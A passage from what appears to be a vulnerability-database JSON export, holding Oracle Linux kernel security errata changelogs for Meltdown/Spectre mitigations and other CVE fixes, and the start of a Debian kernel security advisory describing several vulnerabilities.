kaiser/mm: fix RESTORE_CR3 crash in kaiser_stop_machine (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use stop_machine for enable/disable knob (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: use atomic ops to poison/unpoison user pagetables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use invpcid to flush the two kaiser PCID AISD (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use two PCID ASIDs optimize the TLB during enter/exit kernel (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stop patching flush_tlb_single (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: If INVPCID is available, use it to flush global mappings (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use PCID feature to make user and kernel switches faster (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/64: Initialize CR4.PCIDE early (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Add a 'noinvpcid' boot option to turn off INVPCID (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Add the 'nopcid' boot option to turn off PCID (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: validate trampoline stack (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Move SYSENTER_stack to the beginning of struct tss_struct (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: isolate the user mapped per cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: selective boot time defaults (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser/xen: Dynamically disable KAISER when running under Xen PV (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add Kconfig (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: avoid false positives during non-kaiser pgd updates (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Respect disabled CPU features (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: trampoline stack comments (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stack trampoline (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: re-enable vsyscalls (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow to build KAISER with KASRL (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow KAISER to be enabled/disabled at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: un-poison PGDs at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add a function to check for KAISER being enabled (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add debugfs file to turn KAISER on/off at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable native VSYSCALL (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map virtually-addressed performance monitoring buffers (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add kprobes text section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map trace interrupt entry (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map entry stack per-cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map dynamically-allocated LDTs (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: make sure static PGDs are 8k in size (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow NX poison to be set in p4d/pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: unmap kernel from userspace page tables (core patch) (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: mark per-cpu data structures required for entry/exit (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: introduce user-mapped per-cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add cr3 switches to entry code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: remove scratch registers (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: prepare assembly for entry/exit CR3 switching (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Document X86_CR4_PGE toggling behavior (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/tlb: Make CR4-based TLB flushes more robust (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Do not set _PAGE_USER for init_mm page tables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] increase robusteness of bad_iret fixup handler (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Check if PUD is large when validating a kernel address (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] Separate out entry text section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] linux/const.h: Add _BITUL() and _BITULL() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] linux/mmdebug.h: add VM_WARN_ON() and VM_WARN_ON_ONCE() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] stddef.h: Move offsetofend() from vfio.h to a generic kernel header (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n[2.6.32-696.18.1]\n- [s390] s390/qdio: clear DSCI prior to scanning multiple input queues (Hendrik Brueckner) [1513314 1467962]\n- [net] sctp: do not loose window information if in rwnd_over (Marcelo Leitner) [1514443 1492220]\n- [net] sctp: fix recovering from 0 win with small data chunks (Marcelo Leitner) [1514443 1492220]\n- [s390] zfcp: fix erp_action use-before-initialize in REC action trace (Hendrik Brueckner) [1512425 1497000]\n- [hv] vmbus: Fix error code returned by vmbus_post_msg() (Vitaly Kuznetsov) [1506145 1491846]\n- [hv] vmbus: Increase the time between retries in vmbus_post_msg() (Vitaly Kuznetsov) [1506145 1491846]\n- [hv] vmbus: Raise retry/wait limits in vmbus_post_msg() (Vitaly Kuznetsov) [1506145 1491846]\n- [hv] vmbus: Reduce the delay between retries in vmbus_post_msg() (Vitaly Kuznetsov) [1506145 1491846]\n- [scsi] be2iscsi: fix bad extern declaration (Maurizio Lombardi) [1507512 1497152]\n- [kernel] mqueue: fix a use-after-free in sys_mq_notify() (Davide Caratti) [1476122 1476124] {CVE-2017-11176}\n- [net] ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt() (Matteo Croce) [1477008 1477006] {CVE-2017-7542}\n- [net] ipv6: avoid overflow of offset in ip6_find_1stfragopt (Matteo Croce) [1477008 1477006] {CVE-2017-7542}\n- [net] ipv6: Fix leak in ipv6_gso_segment() (Sabrina Dubroca) [1502417 1459951] {CVE-2017-9074}\n- [net] gre: fix a possible skb leak (Sabrina Dubroca) [1502417 1459951] {CVE-2017-9074}\n- [net] ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Sabrina Dubroca) [1502417 1459951] {CVE-2017-9074}\n- [net] ipv6: Check ip6_find_1stfragopt() return value properly (Sabrina Dubroca) [1502417 1459951] {CVE-2017-9074}\n- [net] ipv6: Prevent overrun when parsing v6 header options (Sabrina Dubroca) [1502417 1459951] {CVE-2017-9074}\n[2.6.32-696.17.1]\n- [fs] nfsd: reorder nfsd_cache_match to check more powerful discriminators first (Thiago Becker) [1509876 1435787]\n- [fs] nfsd: split DRC global spinlock into per-bucket locks (Thiago Becker) [1509876 1435787]\n- [fs] nfsd: convert num_drc_entries to an atomic_t (Thiago Becker) [1509876 1435787]\n- [fs] nfsd: remove the cache_hash list (Thiago Becker) [1509876 1435787]\n- [fs] nfsd: convert the lru list into a per-bucket thing (Thiago Becker) [1509876 1435787]\n- [fs] nfsd: clean up drc cache in preparation for global spinlock elimination (Thiago Becker) [1509876 1435787]", "edition": 73, "modified": "2018-01-04T00:00:00", "published": "2018-01-04T00:00:00", "id": "ELSA-2018-0008", "href": "http://linux.oracle.com/errata/ELSA-2018-0008.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-9074", "CVE-2017-5715", "CVE-2017-7542"], "description": "[2.6.32-696.20.1.OL6]\n- Update genkey [bug 25599697]\n[2.6.32-696.20.1]\n- [x86] kaiser/efi: unbreak tboot (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] pti/mm: Fix trampoline stack problem with XEN PV (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] pti/mm: Fix XEN PV boot failure (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Invoke TRACE_IRQS_IRETQ in paranoid_userspace_restore_all (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: show added cpuid flags in /proc/cpuinfo after late microcode update (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: svm: spec_ctrl at vmexit needs per-cpu areas functional (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Eliminate redundnat FEATURE Not Present messages (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: enable IBRS and stuff_RSB before calling NMI C code (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip CAP_SYS_PTRACE check to skip audit (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: disable ibrs while in intel_idle() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: skip IBRS/CR3 restore when paranoid exception returns to userland (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- Revert 'x86/entry: Use retpoline for syscall's indirect calls' (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/dump_pagetables: Allow dumping current pagetables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add a pgd argument to walk_pgd_level() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/dump_pagetables: Add page table directory (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Remove unneeded nmi_userspace code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix nmi exit code with CONFIG_TRACE_IRQFLAGS (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: init_tss is supposed to go in the PAGE_ALIGNED per-cpu section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Clear kdump pgd page to prevent incorrect behavior (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: consider the init_mm.pgd a kaiser pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: convert userland visible 'kpti' name to 'pti' (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: set IBRS during resume from RAM if ibrs_enabled is 2 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: __load_cr3 in resume from RAM after kernel %gs has been restored (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: Revert the __GFP_COMP flag change (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix paranoid_exit() trampoline clobber (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] spec_ctrl: allow use_ibp_disable only if both SPEC_CTRL and IBPB_SUPPORT are missing (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Documentation spec_ctrl.txt (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: remove irqs_disabled() check from intel_idle() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use enum when setting ibrs/ibpb_enabled (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: undo speculation barrier for ibrs_enabled and noibrs_cmdline (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce ibpb_enabled = 2 for IBPB instead of IBRS (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: introduce SPEC_CTRL_PCP_ONLY_IBPB (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: cleanup s/flush/sync/ naming when sending IPIs (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: set IBRS during CPU init if in ibrs_enabled == 2 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use IBRS_ENABLED instead of 1 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: allow the IBP disable feature to be toggled at runtime (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: always initialize save_reg in ENABLE_IBRS_SAVE_AND_CLOBBER (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: ibrs_enabled() is expected to return > 1 (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: CLEAR_EXTRA_REGS and extra regs save/restore (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on syscall (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Add back STUFF_RSB to interrupt and error paths (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm/kaiser: make is_kaiser_pgd reliable (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] revert: mm/kaiser: Disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: fix pgd freeing in error path (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Fix 32-bit program crash with 64-bit kernel on AMD boxes (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: reload spec_ctrl cpuid in all microcode load paths (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: Prevent unwanted speculation without IBRS (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add noibrs noibpb boot options (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Use retpoline for syscall's indirect calls (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] syscall: Clear unused extra registers on 32-bit compatible syscall entrance (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: rescan cpuid after a late microcode update (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: add debugfs ibrs_enabled ibpb_enabled (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: consolidate the spec control boot detection (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] Remove __cpuinitdata from some data & function (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] KVM/spec_ctrl: allow IBRS to stay enabled in host userland (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: move stuff_RSB in spec_ctrl.h (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Remove STUFF_RSB in error and interrupt code (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Stuff RSB for entry to kernel for non-SMEP platform (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm: Only set IBPB when the new thread cannot ptrace (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] mm: Set IBPB upon context switch (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS when offlining cpu and re-enable (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] idle: Disable IBRS entering idle and enable it on wakeup (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: implement spec ctrl C methods (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: save IBRS MSR value in save_paranoid for NMI (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] enter: Use IBRS on syscall and interrupts (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: swap rdx with rsi for nmi nesting detection (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: spec_ctrl_pcp and kaiser_enabled_pcp in same cachline (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] spec_ctrl: use per-cpu knob instead of ALTERNATIVES for ibpb and ibrs (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] enter: MACROS to set/clear IBRS and set IBPB (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] x86: add SPEC_CTRL to MSR and CPUID lists (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] svm: Set IBPB when running a different VCPU (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] vmx: Set IBPB when running a different VCPU (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [kvm] x86: clear registers on VM exit (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] [kvm] Pad RSB on VM transition (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [security] Add SPEC_CTRL Kconfig option (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpu/AMD: Control indirect branch predictor when SPEC_CTRL not available (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] feature: Report presence of IBPB and IBRS control (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] feature: Enable the x86 feature to control Speculation (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpuid: Provide get_scattered_cpuid_leaf() (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpuid: Cleanup cpuid_regs definitions (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] microcode: Share native MSR accessing variants (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] nop: Make the ASM_NOP* macros work from assembly (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] cpu: Clean up and unify the NOP selection infrastructure (Waiman Long) [1519797 1519796] {CVE-2017-5715}\n- [x86] entry: Further simplify the paranoid_exit code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Remove trampoline check from paranoid entry path (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Don't switch to trampoline stack in paranoid_exit (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Simplify trampoline stack restore code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [misc] locking/barriers: prevent speculative execution based on Coverity scan results (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [fs] udf: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [fs] prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [scsi] qla2xxx: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [netdrv] p54: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [netdrv] carl9170: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [media] uvcvideo: prevent speculative execution (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] cpu/AMD: Make the LFENCE instruction serialized (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [kernel] locking/barriers: introduce new memory barrier gmb() (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] Fix typo preventing msr_set/clear_bit from having an effect (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] Add another set of MSR accessor functions (Waiman Long) [1519787 1519789] {CVE-2017-5753}\n- [x86] mm/kaiser: Replace kaiser with kpti to sync with upstream (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map the trace idt tables in userland shadow pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add 'kaiser' and 'nokaiser' boot options (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: fix RESTORE_CR3 crash in kaiser_stop_machine (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use stop_machine for enable/disable knob (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: use atomic ops to poison/unpoison user pagetables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use invpcid to flush the two kaiser PCID AISD (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use two PCID ASIDs optimize the TLB during enter/exit kernel (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stop patching flush_tlb_single (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: If INVPCID is available, use it to flush global mappings (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: use PCID feature to make user and kernel switches faster (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/64: Initialize CR4.PCIDE early (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Add a 'noinvpcid' boot option to turn off INVPCID (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Add the 'nopcid' boot option to turn off PCID (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: validate trampoline stack (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] entry: Move SYSENTER_stack to the beginning of struct tss_struct (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: isolate the user mapped per cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: selective boot time defaults (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser/xen: Dynamically disable KAISER when running under Xen PV (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add Kconfig (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: avoid false positives during non-kaiser pgd updates (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Respect disabled CPU features (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] kaiser/mm: trampoline stack comments (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: stack trampoline (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: re-enable vsyscalls (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow to build KAISER with KASRL (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow KAISER to be enabled/disabled at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: un-poison PGDs at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add a function to check for KAISER being enabled (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add debugfs file to turn KAISER on/off at runtime (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: disable native VSYSCALL (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map virtually-addressed performance monitoring buffers (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add kprobes text section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map trace interrupt entry (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map entry stack per-cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: map dynamically-allocated LDTs (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: make sure static PGDs are 8k in size (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: allow NX poison to be set in p4d/pgd (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: unmap kernel from userspace page tables (core patch) (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: mark per-cpu data structures required for entry/exit (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: introduce user-mapped per-cpu areas (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: add cr3 switches to entry code (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: remove scratch registers (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: prepare assembly for entry/exit CR3 switching (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/kaiser: Disable global pages by default with KAISER (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Document X86_CR4_PGE toggling behavior (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm/tlb: Make CR4-based TLB flushes more robust (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Do not set _PAGE_USER for init_mm page tables (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] increase robusteness of bad_iret fixup handler (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] mm: Check if PUD is large when validating a kernel address (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [x86] Separate out entry text section (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] linux/const.h: Add _BITUL() and _BITULL() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] linux/mmdebug.h: add VM_WARN_ON() and VM_WARN_ON_ONCE() (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n- [include] stddef.h: Move offsetofend() from vfio.h to a generic kernel header (Waiman Long) [1519799 1519802] {CVE-2017-5754}\n[2.6.32-696.19.1]\n- [scsi] bnx2fc: Fix hung task messages when a cleanup response is not received during abort (Chad Dupuis) [1523783 1504260]", "edition": 73, "modified": "2018-01-25T00:00:00", "published": "2018-01-25T00:00:00", "id": "ELSA-2018-0169", "href": "http://linux.oracle.com/errata/ELSA-2018-0169.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-02-02T13:14:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-7346", "CVE-2017-10810", "CVE-2017-7533", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-7542", "CVE-2017-9605", "CVE-2017-1000365"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3927-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 07, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2017-7346 CVE-2017-7482 CVE-2017-7533 CVE-2017-7541\n CVE-2017-7542 CVE-2017-9605 CVE-2017-10810 CVE-2017-10911\n CVE-2017-11176 CVE-2017-1000365\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7346\n\n Li Qiang discovered that the DRM driver for VMware virtual GPUs does\n not properly check user-controlled values in the\n vmw_surface_define_ioctl() functions for upper limits. A local user\n can take advantage of this flaw to cause a denial of service.\n\nCVE-2017-7482\n\n Shi Lei discovered that RxRPC Kerberos 5 ticket handling code does\n not properly verify metadata, leading to information disclosure,\n denial of service or potentially execution of arbitrary code.\n\nCVE-2017-7533\n\n Fan Wu and Shixiong Zhao discovered a race condition between inotify\n events and VFS rename operations allowing an unprivileged local\n attacker to cause a denial of service or escalate privileges.\n\nCVE-2017-7541\n\n A buffer overflow flaw in the Broadcom IEEE802.11n PCIe SoftMAC WLAN\n driver could allow a local user to cause kernel memory corruption,\n leading to a denial of service or potentially privilege escalation.\n\nCVE-2017-7542\n\n An integer overflow vulnerability in the ip6_find_1stfragopt()\n function was found allowing a local attacker with privileges to open\n raw sockets to cause a denial of service.\n\nCVE-2017-9605\n\n Murray McAllister discovered that the DRM driver for VMware virtual\n GPUs does not properly initialize memory, potentially allowing a\n local attacker to obtain sensitive information from uninitialized\n kernel memory via a crafted ioctl call.\n\nCVE-2017-10810\n\n Li Qiang discovered a memory leak flaw within the VirtIO GPU driver\n resulting in denial of service (memory consumption).\n\nCVE-2017-10911 / XSA-216\n\n Anthony Perard of Citrix discovered an information leak flaw in Xen\n blkif response handling, allowing a 